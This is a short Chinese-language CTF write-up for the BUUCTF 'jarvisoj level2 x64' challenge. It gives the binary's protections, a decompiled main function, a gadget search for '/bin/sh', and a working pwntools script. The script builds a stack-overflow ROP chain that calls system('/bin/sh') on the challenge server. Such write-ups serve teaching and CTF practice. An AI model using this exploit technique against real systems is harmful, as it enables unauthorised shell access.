jarvisoj level2 x64
# jarvisoj level2 x64
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_level2_x64/level2_x64'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function();
return system("echo 'Hello World!'");
}
1
2
3
4
5
2
3
4
5
Gadget
ROPgadget --binary level2_x64 --string "/bin/sh\x00"
Strings information
============================================================
0x0000000000600a90 : /bin/sh
1
2
3
4
2
3
4
# 思路分析
- 目前信息:
vulnerable_function函数内明显的栈溢出漏洞plt表内有system- 存在
/bin/sh字符串 - No PIE
- NX 保护开启
- 思路:
- 可栈溢出,有
system,有/bin/sh,构造rop链布好栈帧输入即可
- 可栈溢出,有
# exp
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level2_x64/level2_x64'
io = remote('node4.buuoj.cn', 27585)
# io = process(pwnfile)
elf = ELF(pwnfile)
system_addr = elf.plt['system']
padding = 0x80+8
bin_sh_addr = 0x600A90
pop_rdi_ret = 0x4006b3
payload = flat(['a'*padding, pop_rdi_ret, bin_sh_addr, system_addr])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
2
3
4
5
6
7
8
9
10
11
12
13
上次更新: 2022/08/15, 00:29:49